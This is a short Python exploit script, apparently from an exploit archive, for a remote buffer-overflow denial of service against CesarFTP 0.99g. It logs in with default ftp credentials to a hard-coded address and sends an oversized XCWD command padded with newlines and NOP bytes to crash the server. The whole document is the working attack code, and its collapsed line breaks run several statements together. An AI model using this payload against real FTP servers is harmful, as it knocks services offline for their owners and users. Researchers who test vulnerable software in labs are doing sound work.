#!/usr/bin/env python #-*- coding:utf-8 -*- # Exploit Title         : CesarFTP 0.99g -(XCWD)Remote BoF Exploit # Discovery by              : Irving Aguilar # Email         : im.aguilar@protonmail.ch # Discovery Date        : 18.01.2016 # Tested Version        : 0.99g # Vulnerability Type  : Denial of Service (DoS) # Tested on OS          : Windows XP Professional SP3 x86 es    import socket       buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20target = '192.168.1.73'port = 21   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((target, port)) print '[*] Target: ' + target print '[*] Port: ' + str(port) s.recv(1024)    s.send('USER ftp\r\n') s.recv(1024)    s.send('PASS ftp\r\n') s.recv(1024)    s.send( buffer  + '\r\n') print '[+] Buffer sent's.close()